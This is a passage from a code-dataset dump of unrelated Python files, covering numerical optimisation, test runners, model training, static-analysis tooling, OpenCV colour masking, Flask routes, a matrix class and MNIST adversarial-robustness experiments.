location\n\t\t\t\txLast = x\n\t\t\t\tyLast = y\n\t\t\t\tobjectiveLast = objectiveBest\n\n\t\t\t\tx = xNew\n\t\t\t\ty = yNew\n\t\t\t\tobjectiveBest = objectiveNew\n\n\t\t\t\t# Check convergence\n\t\t\t\tepsilon = objectiveLast - objectiveBest\n\t\t\t\tprint(\"Best solution so far: %2.4f\" % (objectiveBest))\n\n\t\tif epsilon <= tolerance or i >= 
maxIterations:\n\t\t\tshouldContinue = False\n\n\treturn (x, y, objectiveBest)\n\ndef bruteForceMinimum2D(objectiveFunction,xSearchRange,ySearchRange,constraints,resolution):\n\n\tobjectiveExpression = sy.sympify(objectiveFunction)\n\tconstraintExpressions = []\n\tfor constraint in constraints:\n\t\tconstraintExpressions.append(sy.sympify(constraint))\n\n\txArray = np.arange(xSearchRange[0], xSearchRange[1], resolution).tolist()\n\tyArray = np.arange(ySearchRange[0], ySearchRange[1], resolution).tolist()\n\n\txBest = 999999999.9\n\tyBest = 999999999.9\n\tzBest = 9999999.9999\n\n\t# Iteration loop\n\tfor x in xArray:\n\t\tprint(\"x position: %2.4f\" % (x))\n\t\tfor y in yArray:\n\t\t\tz = evaluateExpression(expression=objectiveExpression, x=x,y=y)\n\t\t\tvalidPoint = True\n\t\t\tif z < zBest:\n\t\t\t\tfor g in constraintExpressions:\n\t\t\t\t\tif evaluateExpression(expression=g,x=x,y=y) > 0:\n\t\t\t\t\t\tvalidPoint = False\n\n\t\t\t\tif validPoint == True:\n\t\t\t\t\txBest = x\n\t\t\t\t\tyBest = y\n\t\t\t\t\tzBest = z\n\n\treturn (xBest, yBest, zBest)\n","sub_path":"NumericalOptimization.py","file_name":"NumericalOptimization.py","file_ext":"py","file_size_in_byte":26617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"187628408","text":"# -*- coding:utf-8 -*-\n__author__ = 'Eike'\nimport os\nimport time\nimport unittest\nimport threading\nfrom common import HTMLTestRunner,data\n# from common import HTMLTestRunner_cn,data\n\n\n# 用例路径\n# case_path = os.path.join(os.getcwd(), \".\")\ncase_path = data.file+'UIAutoTestCase_papa/TestCase/'\nresult = data.file+\"selenium/\"\n\ndef Createsuite():\n # 定义单元测试容器\n testunit = unittest.TestSuite()\n # 定搜索用例文件的方法\n discover = unittest.defaultTestLoader.discover(case_path, pattern='TC_ppandroid8_buy_below.py',\n top_level_dir=None)# 将测试用例加入测试容器中\n # discover = unittest.defaultTestLoader.discover(case_path, pattern='TC_1ppandroid9_buy_above.py',\n # top_level_dir=None) # 
将测试用例加入测试容器中\n # discover = unittest.defaultTestLoader.discover(case_path, pattern='TC_1ppandroid10_saling_above.py',\n # top_level_dir=None) # 将测试用例加入测试容器中\n for test_suite in discover:\n for casename in test_suite:\n testunit.addTest(casename)\n print(casename)\n return testunit\ntest_case = Createsuite()\n\n\n# 定义个报告存放路径,支持相对路径\n# tdresult = result + day\nif os.path.exists(result):\n imestr = time.strftime('%Y%m%d%H%M%S', time.localtime(time.time()))\n filename = result + \"pp_Android.html\"\n fp = open(filename, 'wb')\n # 定义测试报告\n runner = HTMLTestRunner.HTMLTestRunner(stream=fp, title='啪啪钱包ndroid自动化回归测试报告', description='用例执行情况:')\n # runner = HTMLTestRunner_cn.HTMLTestRunner(stream=fp, title='信用管家android服务模块自动化回归测试报告',\n # description='用例执行情况:',\n # verbosity=2,\n # retry=1)\n # 运行测试用例\n runner.run(test_case)\n fp.close() # 关闭报告文件\nelse:\n os.mkdir(result)\n filename = result + \"\\\\\" + \"pp_Android.html\"\n fp = open(filename, 'wb')\n # 定义测试报告\n runner = HTMLTestRunner.HTMLTestRunner(stream=fp, title='啪啪钱包ndroid自动化回归测试报告', description='用例执行情况:')\n # runner = HTMLTestRunner_cn.HTMLTestRunner(stream=fp, title='信用管家android服务模块自动化回归测试报告',\n # description='用例执行情况:',\n # verbosity=2,\n # retry=1)\n # 运行测试用例\n runner.run(test_case)\n fp.close() # 关闭报告文件\n","sub_path":"UIAutoTestCase_papa-master-318dedd5f9b3bd112147717b3e654d000e216775/UIAutoTestCase_papa-master-318dedd5f9b3bd112147717b3e654d000e216775/run_all_cases_all.py","file_name":"run_all_cases_all.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"230436699","text":"import os\nfrom timeit import default_timer as timer\nimport random\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom sklearn.metrics import roc_auc_score\nimport nsml\n\nimport data_utils\nimport data_local_loader\n\nfrom args import get_config\nfrom data_local_loader import get_dataloaders\nfrom model 
import CharCNNScorer\n\n\nTRAIN_BATCH_IDX = 0\n\n\ndef bind_nsml(model, optimizer, config):\n def save(dir_name, *args, **kwargs):\n os.makedirs(dir_name, exist_ok=True)\n state = {\n \"model\": model.state_dict(),\n \"optimizer\": optimizer.state_dict(),\n }\n torch.save(state, os.path.join(dir_name, \"model\"))\n print(\"saved\")\n\n def load(dir_name, *args, **kwargs):\n state = torch.load(os.path.join(dir_name, \"model\"))\n model.load_state_dict(state[\"model\"])\n optimizer.load_state_dict(state[\"optimizer\"])\n print(\"loaded\")\n\n def infer(dataset_path):\n return _infer(model, config, dataset_path)\n\n nsml.bind(save=save, load=load, infer=infer)\n\n\ndef _infer(model, config, dataset_path):\n test_loader = data_local_loader.QuerySimDataLoader(\n dataset_path,\n \"test_data\",\n label_file_name=None,\n batch_size=config.batch_size,\n max_sequence_len=config.max_sequence_len,\n is_train=False,\n shuffle=False,\n )\n\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n all_logits = []\n for i, (uid, a_seqs, len_a_seqs, b_seqs, len_b_seqs) in enumerate(test_loader):\n a_seqs, b_seqs = a_seqs.to(device), b_seqs.to(device)\n logits = model(a_seqs, b_seqs, len_a_seqs, len_b_seqs)\n all_logits.append(torch.sigmoid(logits).data.cpu().numpy())\n\n all_logits = np.concatenate(all_logits, axis=0)\n return all_logits\n\n\ndef run_epoch(\n epoch_idx,\n data_loader,\n model,\n criterion,\n optimizer,\n device,\n log_steps,\n):\n total_loss = 0\n epoch_preds = []\n epoch_targets = []\n epoch_start = timer()\n\n for i, (uid, a_seqs, len_a_seqs, b_seqs, len_b_seqs, labels) in enumerate(data_loader):\n a_seqs, b_seqs, labels = a_seqs.to(device), b_seqs.to(device), labels.to(device)\n\n logits = model(a_seqs, b_seqs, len_a_seqs, len_b_seqs)\n loss = criterion(logits, labels)\n\n batch_loss = loss.data.cpu().item()\n total_loss += batch_loss\n\n if data_loader.is_train:\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n global TRAIN_BATCH_IDX\n\n 
nsml.report(\n summary=False,\n step=TRAIN_BATCH_IDX,\n scope=locals(),\n **{\n f\"train__batch_loss\": batch_loss,\n })\n\n if i > 0 and i % log_steps == 0:\n print(f\"batch {i:5} loss > {loss.item():.4}\")\n\n TRAIN_BATCH_IDX += 1\n\n epoch_preds.append(torch.sigmoid(logits).data.cpu().numpy())\n epoch_targets.append(labels.int().data.cpu().numpy())\n\n score = roc_auc_score(\n np.concatenate(epoch_targets, axis=0),\n np.concatenate(epoch_preds, axis=0),\n )\n\n mode = \"train\" if data_loader.is_train else \"valid\"\n print(f\"epoch {epoch_idx:02} {mode} score > {score:.4} ({int(timer() - epoch_start)}s)\")\n\n total_loss /= len(data_loader.dataset)\n return score, total_loss\n\n\nif __name__ == \"__main__\":\n config = get_config()\n\n # random seed\n random.seed(config.seed)\n np.random.seed(config.seed)\n torch.random.manual_seed(config.seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed(config.seed)\n\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n print(f\"device: {device}\")\n\n model = CharCNNScorer(\n vocab_size=len(data_utils.vocabs),\n char_embed_size=config.char_embed_size,\n filter_sizes=config.filter_sizes,\n sentence_embed_size=config.sentence_embed_size,\n dropout=config.dropout,\n activation=config.activation,\n pad_ind=data_utils.PAD_IND,\n ).to(device)\n print(str(model))\n\n optimizer = optim.Adam(\n filter(lambda p: p.requires_grad, model.parameters()),\n lr=config.learning_rate,\n )\n\n bind_nsml(model, optimizer, config)\n if config.pause:\n nsml.paused(scope=locals())\n\n if config.mode == \"train\":\n print(\"train\")\n\n train_loader, valid_loader = get_dataloaders(config)\n criterion = nn.BCEWithLogitsLoss()\n\n num_batches = len(train_loader.dataset) // config.batch_size\n num_batches = num_batches + int((len(train_loader.dataset) % config.batch_size) > 0)\n print(f\"number of batches per epoch: {num_batches}\")\n\n best_epoch_idx = -1\n best_valid_score = 0\n early_stop_count = 0\n\n # train\n for epoch_idx 
in range(1, config.num_epochs + 1):\n\n def _run_epoch(data_loader):\n return run_epoch(\n epoch_idx,\n data_loader,\n model,\n criterion,\n optimizer,\n device,\n config.log_steps\n )\n\n model.train()\n train_score, train_loss = _run_epoch(train_loader)\n\n # evaluate\n model.eval()\n with torch.no_grad():\n valid_score, valid_loss = _run_epoch(valid_loader)\n if best_valid_score < valid_score:\n best_valid_score = valid_score\n best_epoch_idx = epoch_idx\n print(f\"* best valid score {best_valid_score:.4} achieved at epoch {best_epoch_idx:02}\")\n early_stop_count = 0\n else:\n early_stop_count += 1\n\n if early_stop_count >= config.early_stop_threshold:\n print(\"early stopping\")\n break\n\n nsml.report(\n summary=True,\n step=epoch_idx,\n scope=locals(),\n **{\n \"train__epoch_score\": float(train_score),\n \"train__epoch_loss\": float(train_loss),\n \"valid__epoch_score\": float(valid_score),\n \"valid__epoch_loss\": float(valid_loss),\n })\n\n nsml.save(str(epoch_idx))\n\n print(f\"***** best valid score {best_valid_score:.4} achieved at epoch {best_epoch_idx:02}\")\n","sub_path":"18_tcls_query/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"197951139","text":"#!/usr/local/bin/python\n# coding=utf-8\n\n\nimport json\nimport math\nimport os\nimport xml.etree.cElementTree as ET\nimport re\n\n\n# 规则\n\n# 变量最长值 default 20\nLONG_VARIABLE_NAME = 20\n\n# 变量最短值 default 3\nSHORT_VARIABLE_NAME = 3\n\n# 圈复杂度 defualt 10\nCYCLOMATIC_COMPLEXITY = 10\n\n# 类行数 default 1000\nLONG_CLASS = 1000\n\n# 行字节数 default 100\nLONG_LINE = 130\n\n# 方法行数 default 50\nLONG_METHOD = 150\n\n# 忽略注释后括号后的有效代码行数 default 30\nNCSS_METHOD = 130\n\n# 嵌套深度 default 5\nNESTED_BLOCK_DEPTH = 5\n\n# 路径复杂度 default 200\nNPATH_COMPLEXITY = 200\n\n# 类属性字段数量 default 20\nTOO_MANY_FIELDS = 20\n\n# 类方法数量 default 30\nTOO_MANY_METHODS = 30\n\n# 方法参数 default 10\nTOO_MANY_PARAMETERS = 
10\n\n\n# 违规阀值\nMAX_PRIORITY1 = 1000000\nMAX_PRIORITY2 = 1000000\nMAX_PRIORITY3 = 1000000\n\n# 每个文件最大Json个数\nmaxCountPerFile = 1000\n\nreversed_json_file_name = 'compile_commands'\n\n\n# 配置信息\nglobal_properties = {}\n\n\n# 准备工作\ndef prepare():\n\n if os.path.exists(\"xcodebuild.log\"):\n os.remove(\"xcodebuild.log\")\n print(\"Remove xcodebuild.log\")\n\n if os.path.exists(\"compile_commands.json\"):\n os.remove(\"compile_commands.json\")\n print(\"Remove compile_commands.json\")\n\n if os.path.exists(\"oclint.xml\"):\n os.remove(\"oclint.xml\")\n print(\"Remove oclint.xml\")\n\n\n# 加载配置文件\ndef load_properties(file_name):\n\n try:\n fopen = open(file_name, 'r')\n for line in fopen:\n line = line.strip()\n if line.find('=') > 0 and not line.startswith('#'):\n strs = line.split('=')\n global_properties[strs[0].strip()] = strs[1].strip()\n except Exception as e:\n print(e.message)\n else:\n fopen.close()\n\n\n# 读配置文件\ndef read_properties(key_value, default_value=''):\n\n if key_value in global_properties.keys():\n return global_properties[key_value]\n else:\n return default_value\n\n\n# 编译\ndef xcode_build(work_space, scheme):\n clean_command = \"xcodebuild -workspace %s -scheme %s -configuration Debug clean\" % (work_space, scheme)\n os.system(clean_command)\n\n build_command = \"xcodebuild COMPILER_INDEX_STORE_ENABLE=NO CLANG_ENABLE_MODULE_DEBUGGING=NO -workspace %s -scheme %s -configuration Debug build | tee xcodebuild.log | xcpretty -r json-compilation-database --output compile_commands.json\" % (work_space, scheme)\n os.system(build_command)\n\n\n# 重命名\ndef rename(file_path, new_name):\n paths = os.path.split(file_path)\n\n new_path = os.path.join(paths[0], new_name)\n\n os.rename(file_path, new_path)\n\n return new_path\n\n\n# 分割Json文件\ndef split_json(all_json_objects):\n total_count = len(all_json_objects)\n sub_file_count = int(math.ceil(float(total_count) / float(maxCountPerFile)))\n\n sub_files = []\n\n for i in range(sub_file_count):\n start = 
i*maxCountPerFile\n end = min((i+1)*maxCountPerFile, total_count)\n sub_json_objects = all_json_objects[start:end]\n file_name = 'compile_commands%02d.json' % (i+1)\n sub_files.append(file_name)\n\n with open(file_name, 'w') as outputHandler:\n outputHandler.write(json.dumps(sub_json_objects, indent=4))\n\n return sub_files\n\n\n# 分析Json文件\ndef lint_jsonfiles(jsonfiles):\n\n i = 0\n result_files = []\n for file_name in jsonfiles:\n print('linting ... %s' % file_name)\n input_file = rename(file_name, 'compile_commands.json')\n out_file = 'oclint%02d.xml' % i\n lint(out_file)\n result_files.append(out_file)\n i += 1\n os.remove(input_file)\n\n return result_files\n\n\n# 读取分析参数\ndef lint_parameter(type_value):\n\n result = \"\"\n parameter_list = []\n\n if type_value == \"-e\" or type_value == \"e\" or type_value == \"enclude\":\n ignores = read_properties(\"sonar.ignores\")\n\n if ignores.find(\",\"):\n parameter_list = ignores.split(\",\")\n\n for str in parameter_list:\n result = result + \" -e \" + str\n else:\n result = ignores\n\n elif type_value == \"-i\" or type_value == \"i\" or type_value == \"include\":\n sources = read_properties(\"sonar.sources\")\n\n if sources.find(\",\"):\n parameter_list = sources.split(\",\")\n\n for str in parameter_list:\n result = result + \" -i \" + str\n else:\n result = sources\n\n else:\n print(\"Unknow type valuse\")\n\n return result\n\n\n# oclint分析\ndef lint(out_file):\n\n i_flag = lint_parameter(\"i\")\n e_flag = lint_parameter(\"e\")\n\n print(\"iFlag=%s\" % i_flag)\n print(\"eFlag=%s\" % e_flag)\n\n lint_command = '''oclint-json-compilation-database -v%s%s\\\n -- \\\n --verbose \\\n -rc=LONG_VARIABLE_NAME=%d \\\n -rc=SHORT_VARIABLE_NAME=%d \\\n -rc=CYCLOMATIC_COMPLEXITY=%d \\\n -rc=LONG_CLASS=%d \\\n -rc=LONG_LINE=%d \\\n -rc=LONG_METHOD=%d \\\n -rc=NCSS_METHOD=%d \\\n -rc=NESTED_BLOCK_DEPTH=%d \\\n -rc=NPATH_COMPLEXITY=%d \\\n -rc=TOO_MANY_FIELDS=%d \\\n -rc=TOO_MANY_METHODS=%d \\\n -rc=TOO_MANY_PARAMETERS=%d \\\n 
--report-type pmd \\\n -max-priority-1=100000 \\\n -max-priority-2=100000 \\\n -max-priority-3=100000 \\\n -o %s''' % (i_flag, e_flag, LONG_VARIABLE_NAME, SHORT_VARIABLE_NAME, CYCLOMATIC_COMPLEXITY, LONG_CLASS, LONG_LINE, LONG_METHOD, NCSS_METHOD, NESTED_BLOCK_DEPTH, NPATH_COMPLEXITY,TOO_MANY_FIELDS, TOO_MANY_METHODS, TOO_MANY_PARAMETER, out_file)\n os.system(lint_command)\n\n\n# 合并结果\ndef combine_outputs(output_files):\n\n first_index = 0\n\n for i in range(len(output_files)):\n if os.path.exists(output_files[i]):\n first_index = i\n break\n\n base_tree = ET.ElementTree(file=output_files[first_index])\n base_root = base_tree.getroot()\n\n left_files = output_files[first_index:len(output_files)]\n for left_file in left_files:\n\n if os.path.exists(left_file):\n\n try:\n tree = ET.ElementTree(file=left_file)\n except Exception as e:\n if e.message.find(\"not well-formed (invalid token)\") == -1:\n print(e.message)\n\n else:\n text = open(left_file).read()\n text = re.sub(\"&\", \"&\", text)\n root = ET.fromstring(text)\n\n for child in root:\n base_root.append(child)\n\n else:\n root = tree.getroot()\n\n for child in root:\n base_root.append(child)\n\n base_tree.write('oclint.xml', encoding='utf-8', xml_declaration=True)\n\n\n# 上报结果\ndef report():\n print(\"Running SonarQube using sonar-scanner\")\n\n os.system(\"sonar-scanner\")\n\n\nif __name__ == \"__main__\":\n\n print(\"========== JDJR code analysis ==========\")\n\n prepare()\n\n load_properties(\"sonar-project.properties\")\n\n work_space = read_properties(\"sonar.objectivec.workspace\")\n if len(work_space) == 0:\n print(\"Please assign sonar.objectivec.workspace\")\n\n scheme = read_properties(\"sonar.objectivec.appScheme\")\n\n if len(scheme) == 0:\n print(\"Please assign sonar.objectivec.appScheme\")\n\n xcode_build(work_space, scheme)\n\n with open(\"compile_commands.json\", 'r') as r_handler:\n json_objects = json.loads(r_handler.read())\n\n # 未超出数量,直接分析\n if len(json_objects) <= maxCountPerFile:\n 
lint('oclint.xml')\n else:\n\n json_file = rename(\"compile_commands.json\", 'input.json')\n json_files = split_json(json_objects)\n xml_files = lint_jsonfiles(json_files)\n\n combine_outputs(xml_files)\n for xml_file in xml_files:\n\n if os.path.exists(xml_file):\n os.remove(xml_file)\n\n rename(json_file, 'compile_commands.json')\n\n report()\n","sub_path":"Other/sonar-oclint/code_analysis.py","file_name":"code_analysis.py","file_ext":"py","file_size_in_byte":7923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"341232168","text":"import cv2\nimport numpy as np\nimport argparse\nfrom matplotlib import pyplot as plt\n\ndef FindPixels(img):\n\n image = cv2.imread('/Users/Dave/Documents/deepdish/data1/set2/'+img+'.JPG')\n image = cv2.resize(image, (700,525))\n hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n\n # define the list of color boundaries 0 < H < 180, 0 < S < 255, 0 < V < 255\n color_ranges = [\n ([30, 128, 128], [32, 255, 228]), #detects yellow (rgb)\n ([0, 128, 0], [15, 255, 156]), #detects red (rgb)\n ([110, 100, 0], [120, 255, 100]) # detects blue (rgb) \n ]\n\n for (lower, upper) in color_ranges:\n # create NumPy arrays from the boundaries\n lower = np.array(lower, dtype = \"uint8\")\n upper = np.array(upper, dtype = \"uint8\")\n \n # find the colors within the specified boundaries and apply the mask\n mask = cv2.inRange(hsv, lower, upper)\n output = cv2.bitwise_and(hsv, hsv, mask = mask)\n \n # show the images\n # cv2.imshow(\"images\", np.hstack([image, output]))\n # cv2.waitKey(0)\n\n\n\nFindPixels('GOPR1799')\nprint('complete')\n\n\n\n\n\n# write function that takes image and returns pixel width of each three","sub_path":"depthdetect.py","file_name":"depthdetect.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"421907739","text":"#!/usr/bin/env python 2.7\n# -*- coding: utf-8 -*-\n\nfrom app import 
app\nimport pymongo\nfrom flask import render_template, jsonify, request\nfrom app.core.datatask.userCore import user_growth_info\nfrom app.core.datatask.dayCore import get_day_norms\nfrom app.core.datatask.weekCore import get_week_norms\nfrom app.core.datatask.globalCore import get_global_norms\n\nclient = pymongo.MongoClient(\"127.0.0.1\",27017)\ndb = client.test\n\nnorm_map = {\n '用户增长量': 'growth', '用户增长率': 'growth_rate',\n '付费用户增长量': 'growth_pay', '付费用户增长率': 'growth_pay_rate',\n '新用户付费比率': 'pay_rate', '一次购买量': 'once', '二次购买量': 'twice', '二次以上购买量': 'more',\n '付费用户总数': 'pay_user_count', '一次购买率': 'once_rate', '二次购买率': 'twice_rate', '多次购买率': 'more_rate'\n}\n\n@app.route('/norm/show', methods=['GET'])\ndef norm_show():\n norm_collect = db['norm']\n day_norms = norm_collect.find({'flag': 'day'}).sort('norm.date', pymongo.DESCENDING)\n week_norms = norm_collect.find({'flag': 'week'}).sort('norm.date', pymongo.DESCENDING)\n global_norms = norm_collect.find({'flag': 'global'}).sort('norm.date', pymongo.DESCENDING)\n return render_template('norm/index.html', day_norms=day_norms, week_norms=week_norms, global_norms=global_norms)\n\n\n@app.route('/norm/index', methods=['GET'])\ndef norm_index():\n norms = {\n 'increase_norm': ['用户增长量', '用户增长率', '付费用户增长量', '付费用户增长率', '新用户付费比率', ],\n 'pay_norm': ['一次购买量', '二次购买量', '二次以上购买量', '付费用户总数', '一次购买率', '二次购买率', '多次购买率']\n }\n return render_template('norm/normData.html', norms=norms, increase_len=len(norms['increase_norm']), pay_len=len(norms['pay_norm']))\n\n\n@app.route('/norm/work', methods=['POST'])\ndef norm_index_work():\n start_date = request.form['startDay']\n end_date = request.form['endDay']\n index_type = request.form['indextype']\n time_choose = request.form['timeChoose']\n\n result_date, result_data = user_growth_info(start_date, end_date, time_choose)\n\n # if time_choose == u'day':\n # date_list, day_norm_dict = get_day_norms(start_date, end_date)\n # norm_data = day_norm_dict[norm_map[str(index_type)]]\n # elif 
time_choose == u'week':\n # date_list, week_norm_dict = get_week_norms(start_date, end_date)\n # norm_data = week_norm_dict[norm_map[str(index_type)]]\n # else:\n # date_list, global_norm_dict = get_global_norms(start_date, end_date)\n # norm_data = global_norm_dict[norm_map[str(index_type)]]\n\n return jsonify({'date_list': result_date, 'norm_data': result_data[norm_map[str(index_type)]]})\n\n\n@app.route('/norm/info/~', methods=['GET'])\ndef norm_info(start_date, end_date):\n pass\n # date_list_day, day_norm_dict = get_day_norms(start_date, end_date)\n # date_list_week, week_norm_dict = get_week_norms(start_date, end_date)\n # date_list_global, global_norm_dict = get_global_norms(start_date, end_date)\n # return jsonify({'date_list_day': date_list_day, 'day_norm_dict': day_norm_dict, 'date_list_week': date_list_week,\n # 'week_norm_dict': week_norm_dict, 'date_list_global': date_list_global, 'global_norm_dict': global_norm_dict})\n","sub_path":"app/routes/normRoute.py","file_name":"normRoute.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"118991677","text":"class Matrix:\n def __init__(self, matrix):\n self.matrix = matrix\n\n def __str__(self):\n result_list = []\n for i, _ in enumerate(self.matrix):\n for col in self.matrix[i]:\n result_list.append(f'{col} ')\n result_list.append('\\n')\n result_str = ''\n return result_str.join(result_list)\n\n def __add__(self, other):\n\n # Здесь делаем проверку размеров матриц\n identical = ValueError('Матрицы разного размера')\n if len(self.matrix) != len(other.matrix):\n raise identical\n for i, _ in enumerate(self.matrix):\n if len(self.matrix[i]) != len(other.matrix[i]):\n raise identical\n\n # Здесь выполняем сложение матриц\n result = []\n for i, _ in enumerate(self.matrix):\n line = []\n for j, _ in enumerate(self.matrix[i]):\n sum_m = self.matrix[i][j] + other.matrix[i][j]\n line.append(sum_m)\n result.append(line)\n 
return Matrix(result)\n\n\n# Проверяем сложение матриц разных размеров\nm_1 = Matrix([[1, 2, 3], [4, 5, 6], [7, 8, 9]])\nm_2 = Matrix([[1, 2, 3], [4, 5, 6], [7, 8, 9]])\nm_3 = Matrix([[1, 2], [4, 5], [7, 8]])\ntry:\n m_4 = m_1 + m_2 + m_3\n print(m_4)\nexcept ValueError as e:\n print(f'Ошибка слагаемых - {e}')\n\n# Проверяем сложение матриц одинаковых размеров\nm_5 = Matrix([[1, 2, 3, 44], [4, 5, 6, 43], [7, 8, 9, 7]])\nm_6 = Matrix([[1, 2, 3, 22], [4, 5, 6, 1], [7, 8, 9, 15]])\nm_7 = Matrix([[1, 2, 33, 0], [4, 5, 14, 21], [7, 8, 93, 4]])\nm_8 = Matrix([[23, 4, 22, 45], [12, 43, 2, 16], [32, 23, 4, 14]])\ntry:\n m_9 = m_5 + m_6 + m_7 + m_8\n print(m_9)\nexcept ValueError as e:\n print(f'Ошибка слагаемых - {e}')\n","sub_path":"Lesson_7/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"335043554","text":"\r\ndef binarySearch (arr, l, r, x):\r\n if r >= l: \r\n mid = l + (r - l) // 2\r\n if arr[mid] == x: \r\n return mid \r\n elif arr[mid] > x: \r\n return binarySearch(arr, l, mid-1, x) \r\n else: \r\n return binarySearch(arr, mid + 1, r, x) \r\n else: \r\n return -1\r\n\r\ndef fn():\r\n n = int(input().strip())\r\n a = list(map(int,input().strip().split()))\r\n b = list(map(int,input().strip().split()))\r\n xor = []\r\n flag = 0\r\n count = 0\r\n c = list(a) + list(b)\r\n\r\n for i in range(n):\r\n for j in range(n):\r\n xor.append(a[i]^b[j])\r\n\r\n xor.sort()\r\n c = list(set(c))\r\n c.sort()\r\n\r\n # for i in range(len(xor)):\r\n # for j in range(len(c)):\r\n # if(xor[i] == c[j]):\r\n # count += 1\r\n # break\r\n\r\n for i in range(len(xor)):\r\n if(binarySearch(c,0,2*n-1,xor[i]) != -1):\r\n count += 1\r\n \r\n\r\n if(count%2==0):\r\n print(\"Yes\")\r\n else:\r\n print(\"No\")\r\n\r\n\r\nfor _ in range(int(input().strip())):\r\n 
fn()","sub_path":"python/Yes_XOR_No.py","file_name":"Yes_XOR_No.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"148340891","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\nfrom keras.models import Model,Input,load_model\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nimport foolbox\n\n\nmnist = input_data.read_data_sets(\"../MNIST_data/\", one_hot=True)\n\ntest=mnist.test.images\n\nclass Exp3(object):\n def __init__(self,model_path,mnist,sample_size=100,epoch=100,lst=[1,3,5]):\n '''\n model_path:模型的路径\n mnist:mnist数据集合\n sample_size:采样的个数\n epoch:采样的轮数\n lst:指定哪几层\n ps:抽样使用的分层抽样 每次保证正确和错误的比例相同\n '''\n self.model_path=model_path\n self.mnist=mnist\n self.sample_size=sample_size\n self.epoch=epoch\n self.lst=lst\n self.model=load_model(self.model_path)\n\n self.model_layer=Model(inputs=self.model.input,outputs=[self.model.layers[i].output for i in lst])\n\n self.lst=lst\n\n self.layer_num=0\n for index in lst:\n self.layer_num+=int(self.model.layers[index].output.shape[-1])\n\n\n self.foolmodel=foolbox.models.KerasModel(self.model,bounds=(0,1),preprocessing=(0,1))\n\n self.attack=foolbox.attacks.IterativeGradientAttack(self.foolmodel)\n\n\n def _split_test(self):\n\n label=np.argmax(self.mnist.test.labels,axis=1)\n pred=np.argmax(self.model.predict(self.mnist.test.images),axis=1)\n self.badcase=self.mnist.test.images[pred!=label]\n self.goodcase=self.mnist.test.images[pred==label]\n\n return len(self.badcase),len(self.goodcase)\n\n def _count(self,image,threshold):\n act_layers=self.model_layer.predict_on_batch(image)\n\n act_num=0\n act_lst=[]\n for act in act_layers:\n act_lst.append(np.sum(act>threshold,axis=0)>0)\n act_num+=(np.sum(act>threshold,axis=0)>0).sum()\n\n ratio=act_num/float(self.layer_num)\n return act_lst,ratio\n\n def _adv(self,image):\n adv_lst=[]\n org_lst=[]\n for 
img in image:\n label=np.argmax(self.model.predict(np.expand_dims(img,axis=0)))\n adv=self.attack(img,label,epsilons=[0.01,0.1,1],steps=100)\n if isinstance(adv,np.ndarray):\n adv_lst.append(adv)\n org_lst.append(img)\n return np.array(adv_lst),np.array(org_lst)\n\n\n def exp(self):\n _,good_num=self._split_test()\n\n result=[]\n\n for epoch in tqdm(range(self.epoch)):\n good_index=np.random.choice(range(good_num),size=self.sample_size,replace=False)\n\n adv_lst,org_lst=self._adv(self.goodcase[good_index])\n\n print(adv_lst.shape,org_lst.shape)\n\n act_adv,ratio_adv=self._count(adv_lst,threshold=0.1)\n\n act_org,ratio_org=self._count(org_lst,threshold=0.1)\n\n result.append([ratio_adv,ratio_org])\n return pd.DataFrame(result,columns=['adv','org'])\n\nif __name__=='__main__':\n model_path='./model/model.hdf5'\n obj=Exp3(model_path,mnist,sample_size=100,epoch=10,lst=[1,3,5])\n result=obj.exp()\n","sub_path":"DNNmutation-master/DNNmutation-master/Exp_cover/CoverAdv.py","file_name":"CoverAdv.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"440462875","text":"# -*- coding:utf-8 -*-\r\n\"\"\" Scraping tools for the WordPress API.\r\n\r\nWE1S Chomp\r\n\"\"\"\r\n\r\nfrom logging import getLogger\r\n\r\nfrom chomp import browser, clean\r\n\r\n\r\n# WordPress API Settings\r\nWP_API_URL = '/wp-json/wp/v2/'\r\nWP_PAGES_URL = 'pages?search={query}&sentence=1'\r\nWP_POSTS_URL = 'posts?search={query}&sentence=1'\r\n\r\n\r\ndef is_wordpress_url(url):\r\n \"\"\" Checks if URL has a WordPress site.\r\n\r\n Returns:\r\n bool: True if API present, False if disabled or not found.\r\n \"\"\"\r\n\r\n log = getLogger(__name__)\r\n\r\n url = url.rstrip('/')\r\n\r\n log.debug('Testing for WordPress API at: %s', url)\r\n response = browser.get_json_from_url(url)\r\n if response is not None and response['namespace'] == 'wp/v2':\r\n log.debug('Ok!')\r\n return True\r\n\r\n log.debug('No API or 
